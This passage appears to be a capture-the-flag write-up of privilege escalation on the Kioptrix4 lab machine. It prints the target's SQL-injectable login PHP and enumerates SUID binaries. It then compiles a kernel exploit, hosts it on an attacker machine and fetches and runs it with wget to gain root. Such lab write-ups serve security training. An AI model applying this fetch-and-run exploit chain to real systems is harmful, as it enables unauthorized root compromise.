Sorry, user john may not run sudo on Kioptrix4.
[email protected]:~$ uname -a
Linux Kioptrix4 2.6.24-24-server #1 SMP Tue Jul 7 20:21:17 UTC 2009 i686 GNU/Linux

Side note… just to confirm, I was pretty on-point with the guess of that PHP code:

[email protected]:/var$ cd www
[email protected]:/var/www$ ls
checklogin.php  database.sql  images  index.php  john  login_success.php  logout.php  member.php  robert
[email protected]:/var/www$ cat checklogin.php 
<?php
ob_start();
$host="localhost"; // Host name
$username="root"; // Mysql username
$password=""; // Mysql password
$db_name="members"; // Database name
$tbl_name="members"; // Table name

// Connect to server and select databse.
mysql_connect("$host", "$username", "$password")or die("cannot connect");
mysql_select_db("$db_name")or die("cannot select DB");

// Define $myusername and $mypassword
$myusername=$_POST['myusername'];
$mypassword=$_POST['mypassword'];

// To protect MySQL injection (more detail about MySQL injection)
$myusername = stripslashes($myusername);
//$mypassword = stripslashes($mypassword);
$myusername = mysql_real_escape_string($myusername);
//$mypassword = mysql_real_escape_string($mypassword);

//$sql="SELECT * FROM $tbl_name WHERE username='$myusername' and password='$mypassword'";
$result=mysql_query("SELECT * FROM $tbl_name WHERE username='$myusername' and password='$mypassword'");
//$result=mysql_query($sql);

// Mysql_num_row is counting table row
$count=mysql_num_rows($result);
// If result matched $myusername and $mypassword, table row must be 1 row

if($count!=0){
// Register $myusername, $mypassword and redirect to file "login_success.php"
        session_register("myusername");
        session_register("mypassword");
        header("location:login_success.php?username=$myusername");
}
else {
echo "Wrong Username or Password";
print('<form method="link" action="index.php"><input type=submit value="Try Again"></form>');
}

ob_end_flush();
?>

Moving on…

$ ps -aux | grep root
Warning: bad ps syntax, perhaps a bogus '-'? See http://procps.sf.net/faq.html
root         1  0.0  0.3   2844  1696 ?        Ss   21:24   0:01 /sbin/init
root         2  0.0  0.0      0     0 ?        S<   21:24   0:00 [kthreadd]
root         3  0.0  0.0      0     0 ?        S<   21:24   0:00 [migration/0]
root         4  0.0  0.0      0     0 ?        S<   21:24   0:00 [ksoftirqd/0]
root         5  0.0  0.0      0     0 ?        S<   21:24   0:00 [watchdog/0]
root         6  0.0  0.0      0     0 ?        S<   21:24   0:00 [events/0]
root         7  0.0  0.0      0     0 ?        S<   21:24   0:00 [khelper]
root        41  0.0  0.0      0     0 ?        S<   21:24   0:00 [kblockd/0]
root        44  0.0  0.0      0     0 ?        S<   21:24   0:00 [kacpid]
root        45  0.0  0.0      0     0 ?        S<   21:24   0:00 [kacpi_notify]
root        90  0.0  0.0      0     0 ?        S<   21:24   0:00 [kseriod]
root       129  0.0  0.0      0     0 ?        S    21:24   0:00 [pdflush]
root       130  0.0  0.0      0     0 ?        S    21:24   0:00 [pdflush]
root       131  0.0  0.0      0     0 ?        S<   21:24   0:00 [kswapd0]
root       173  0.0  0.0      0     0 ?        S<   21:24   0:00 [aio/0]
root      1265  0.0  0.0      0     0 ?        S<   21:24   0:00 [ata/0]
root      1268  0.0  0.0      0     0 ?        S<   21:24   0:00 [ata_aux]
root      1277  0.0  0.0      0     0 ?        S<   21:24   0:00 [scsi_eh_0]
root      1280  0.0  0.0      0     0 ?        S<   21:24   0:00 [scsi_eh_1]
root      1300  0.0  0.0      0     0 ?        S<   21:24   0:00 [ksuspend_usbd]
root      1304  0.0  0.0      0     0 ?        S<   21:24   0:00 [khubd]
root      2203  0.0  0.0      0     0 ?        S<   21:24   0:01 [kjournald]
root      2370  0.0  0.1   2224   636 ?        S<s  21:24   0:00 /sbin/udevd --daemon
root      2596  0.0  0.0      0     0 ?        S<   21:24   0:00 [kpsmoused]
root      3897  0.0  0.0   1716   488 tty4     Ss+  21:24   0:00 /sbin/getty 38400 tty4
root      3898  0.0  0.0   1716   488 tty5     Ss+  21:24   0:00 /sbin/getty 38400 tty5
root      3904  0.0  0.0   1716   488 tty2     Ss+  21:24   0:00 /sbin/getty 38400 tty2
root      3907  0.0  0.0   1716   484 tty3     Ss+  21:24   0:00 /sbin/getty 38400 tty3
root      3912  0.0  0.0   1716   484 tty6     Ss+  21:24   0:00 /sbin/getty 38400 tty6
root      3965  0.0  0.1   1872   544 ?        S    21:24   0:00 /bin/dd bs 1 if /proc/kmsg of /var/run/klogd/kmsg
root      3986  0.0  0.1   5316   984 ?        Ss   21:24   0:00 /usr/sbin/sshd
root      4042  0.0  0.1   1772   524 ?        S    21:24   0:00 /bin/sh /usr/bin/mysqld_safe
root      4084  0.3  5.6 127188 29144 ?        Sl   21:24   0:21 /usr/sbin/mysqld --basedir=/usr --datadir=/var/lib/mysql --user=root --pi
root      4086  0.0  0.1   1700   560 ?        S    21:24   0:00 logger -p daemon.err -t mysqld_safe -i -t mysqld
root      4159  0.0  0.2   6528  1320 ?        Ss   21:24   0:00 /usr/sbin/nmbd -D
root      4161  0.0  0.4  10108  2316 ?        Ss   21:24   0:00 /usr/sbin/smbd -D
root      4175  0.0  0.1  10108  1028 ?        S    21:24   0:00 /usr/sbin/smbd -D
root      4176  0.0  0.2   8084  1300 ?        Ss   21:24   0:00 /usr/sbin/winbindd
root      4189  0.0  0.2   8084  1060 ?        S    21:24   0:00 /usr/sbin/winbindd
root      4208  0.0  0.1   2104   888 ?        Ss   21:24   0:00 /usr/sbin/cron
root      4230  0.0  1.2  20464  6192 ?        Ss   21:24   0:00 /usr/sbin/apache2 -k start
root      4281  0.0  0.0   1716   492 tty1     Ss+  21:24   0:00 /sbin/getty 38400 tty1
root      9188  0.0  0.7  11360  3720 ?        Ss   22:59   0:00 sshd: john [priv]
john      9304  0.0  0.1   3004   752 pts/0    R+   23:04   0:00 grep root

SQL and apache are running as root!

[email protected]:~$ mysql
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 23984
Server version: 5.0.51a-3ubuntu5.4 (Ubuntu)

Type 'help;' or '\h' for help. Type '\c' to clear the buffer.

mysql>

Searched for vulns against apache/mysql, nothing really jumped out at me.

Alright, back to the basics:

# Look for readable files I own
$ find / -readable -and -user john 2>/dev/null | head -n 10
# Look for -u=s bit
$ find / -perm -u=s -type f 2>/dev/null
/usr/lib/apache2/suexec
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/lib/pt_chown
/usr/bin/chsh
/usr/bin/sudo
/usr/bin/traceroute6.iputils
/usr/bin/newgrp
/usr/bin/sudoedit
/usr/bin/chfn
/usr/bin/arping
/usr/bin/gpasswd
/usr/bin/mtr
/usr/bin/passwd
/usr/bin/at
/usr/sbin/pppd
/usr/sbin/uuidd
/lib/dhcp3-client/call-dhclient-script
/bin/mount
/bin/ping6
/bin/fusermount
/bin/su
/bin/ping
/bin/umount
/sbin/umount.cifs
/sbin/mount.cifs

Meh, It’s late lets just jump to kernel a exploit… I learned somewhere to try this last as it causes instability and could force you into lost time, anyway:

$ searchsploit 2.6.x linux Privilege
Linux Kernel 2.4.x/2.6.x (CentOS 4.8/5.3 / RHEL 4.8/5.3 / SuSE 10 SP2/11 / Ubuntu 8.10) (PPC) - \'sock_s | linux/local/9545.c
Linux Kernel 2.4.x/2.6.x - 'Bluez' BlueTooth Signed Buffer Index Privilege Escalation (2)               | linux/local/926.c
Linux Kernel 2.4.x/2.6.x - 'uselib()' Local Privilege Escalation (3)                                    | linux/local/895.c
Linux Kernel 2.4.x/2.6.x - BlueTooth Signed Buffer Index Privilege Escalation (1)                       | linux/local/25288.c
# Compile
$ gcc -Wall -o linux-sendpage 9545.c -m32
# Host
$ python -m SimpleHTTPServer 8000

On the box

[email protected]:/tmp$ wget 10.10.10.3:8000/linux-sendpage
--00:18:10--  http://10.10.10.3:8000/linux-sendpage
           => `linux-sendpage'
Connecting to 10.10.10.3:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 16,012 (16K) [application/octet-stream]

100%[==============================================================================================>] 16,012        --.--K/s             

00:18:10 (252.55 MB/s) - `linux-sendpage' saved [16012/16012]

[email protected]:/tmp$ chmod +x linux-sendpage 
[email protected]:/tmp$ ./linux-sendpage                   
# id
uid=0(root) gid=0(root) groups=1001(john)

We win!

Directory
$ cd content && tree